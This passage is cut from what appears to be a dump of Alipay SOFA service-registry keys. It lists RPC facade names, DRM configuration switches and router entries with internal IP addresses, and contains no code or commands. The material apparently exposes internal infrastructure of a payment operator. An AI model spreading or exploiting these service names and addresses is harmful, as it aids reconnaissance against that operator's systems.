ncore.common.service.facade.alipay.api.rzone.ZlcDailyTaskRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.client.drm.AntPassportSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.insurance.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.ecf.api.EcftransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.ecoqltprodDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcsmart.facade.insurance.RcSmartInsuranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCommandLfuCacheDrm.refreshPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardsales.common.service.facade.PcardOrderTradeCreateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.scence.SceneDefineQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antassistant.biz.home.rest.QueryAlipayUserIdRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.afwrobottwa:name=com.alipay.afwrobottwa.emergency.disableHealthCardClick,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservemng.service.facade.profit.api.AccrualInterestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.pcard_settle_new.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:buservice_process_callback_antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.impl.AipExecutingPayConfigDRMResource.isUseCoupon,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.produce.AssetProduceItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.gift.QueryGiftContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.agreement.creditauth.PcreditCreditAuthAgreementShowUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ismartx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.institution.InstitutionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.event.FasEventHandlerTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrmcore.common.service.facade.service.model.MdpModelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.FrontDetectFeatureActuator:1.0:frontBaseinfoCompleteActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.90.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.eventPipelineSnapShot,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.appinfo.IsvAppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.ErrorCodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.media.api.MediaDetailGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.parentchildmodel.api.PcmtransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.goldeneye.consult.GoldenEyeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.argo.service.facade.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitradeadapter.common.service.facade.service.MerchantAcquireInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.salesrecord.SalesRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:caprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.common.service.facade.bank.api.BankPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_INVOICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.distinguishprod.common.service.facade.ResWhiteListFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:applyModifyAccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.asset.service.EcoResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:whitePageDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterIndInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.meta.RestMetaTableService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradeguard.biz.money.core.LmbMoneyFlowTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.common.dal.daointerface.UkeyBindInfoDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.d4885.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.229.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insttrade.insttrade_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recproxy.common.service.facade.api.FECFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_LINEPAY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.24.8.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkinstassetprod.common.service.facade.api.IaArrangementCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.operation.OperationTargetPropertyLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:adatabus@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.sdk.spi.service.InsIopExterfaceInvokeService:1.0:insiop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSpaceObjectBehaviorApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:grscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DowngradeSwitchConfig.skipProdtransStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.signup.rpc.facade.RecruitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.rundata.RunDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.AccountPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServiceConfigureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.censor:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.security.facade.config.BizConfigService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.facade.product.ProductOnSaleNotifyRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.core.dal.service.DVLableMetaDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.paybox.check.PayBoxCheck:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_R_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcomment.rpc.MyInOutBoxMsgH5Rpc:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.migration.PrincipalResourcePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsEndorsementOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.findecision.FindecisionDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alinp.common.service.facade.detail.DetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.kyc.qualifiedinvestor.QualifiedInvestorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.userscenerela.UserSceneRelaMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.file.FundNetValueFileDisposeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antmembermng_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.mobile.wp.login.facade.LoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.RecomInstanceService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.TransNoTradeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.ext.interest.manager.InterestCreateInstructionTaskManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-and-link-base-info-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.api.CfpVoucherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.IdGenerateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.RemoteServiceDrmResource.topLimitsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.rec.api.RecItemLabelRelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.core.common.antprocess.BPFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iusergrowthus.facade.api.LotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.user.UserInfoQueryService:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.dailymng.UpgradeApproveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon2.common.service.facade.api.OnlyForTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.UserCarbonCountQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DataDictSwitchConfig.exemptPnpsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxian.ipp.service.facade.IppRenderRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.PartnerPromoMergeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.CommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdopunit.facade.api.common.TimeInfoService:1.0:imdb_cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isecuritycore.service.query.facade.BlackNameListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.ModuleSpecConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vehownerprod.facade.EtcSellerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.CatalogRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.ruleMaxFileLine,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:operator@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pms.common.service.facade.onsite.api.PosBizVerifyEx:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imdop.common.service.facade.ImdMerchantCrossSiteQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.245.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.airbops.service.common.proxy.mapitool.facade.ProxyPartnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.invoice.InvoiceCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.LogAttackFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promox.facade.crowd.CrowdAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.CategoryOpQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.recon.ReconResultAdjustCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.multiprofit.YebMultiProfitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.facade.MerchantMsgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.annual.PricemngPriceAnnualRoleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.ArticleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.codprod.common.service.facade.merchant.facade.LogisticsCompanyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.ITopologyRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ebppprod.CZRouteRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.insmobile.insmobileConfDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianquery.service.inner.InsPolicyOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_AGDSDATAHUB#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rating:name=com.alipay.rating.service.facade.localclient.drm.RatingLocalclientDrmImpl.cloudProductCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.156.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.serverlesscore.facade.SchedulerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileha.core.service.antha.AnthaMobileAppDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.maxPerRouteConnections,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ientityfundcontrol.common.service.facade.api.autotest.AutoTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.DeliverUnitMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dss.endpoint.rest.facade.VpcRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininsightmng.common.service.facade.strategy.api.dx.DxPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.CustomerAccountSwitchDrm.skipGenerateCustomerIdSwitchUid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.77.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mindv.survey.statistics.SurveyStatisticsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.advancepayment.api.AptransOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbcateringorderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditcontentprod.facade.service.DictionaryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.bluesky.BlueSkyLeadsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.dwebupload.client.drm.DomainConfig.djWarmUpDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.ecoqltprod_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.finpwm.FinpwmFundFixedManageWrapService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:opsware_extension@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.255.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchopenai.ai.common.service.facade.api.InstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.shared.component.lock.service.LockBSFacade:1.0:bksmartdetect-lockBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.ExRemitInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.13.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkinfocenter.common.service.facade.KgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:paveStuffTemplateFinishHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.landlordgame.facade.api.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilemock.common.service.facade.api.RpcMockServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowPresKademandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.ranking.parameter.StarWishDRMResource.stopRanking,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.129.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ropcn.common.service.facade.api.ShellService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.195.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.core.service.TransInfoCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.zcache.tbase.zdatacontextLoadTestTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.member.MembershipOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.TrainingTaskEvalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ldc.btseller.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iglobalfundcontrol.common.config.api.ClearSettleAgreementBusinessTypeMappingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:tbasemanager-change-plan-execute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.chaos.dig.facade.api.DrillApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequote.api.FundNetValueQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.riskrank.CustomerRiskRankService:1.0:fccustprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcVisitorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaybizcore.common.facade.plan.api.PlanAddFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntassistantBotServiceFacade:1.0:bot_intent_assistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_7300#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.scardcenter.common.service.facade.OfflinepayCodeSeedServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudlego.common.service.facade.CloudlegoServiceOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.log.PublicappModifyLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.AssetProfileDrm.switchWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mtp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_SCCOUNTER_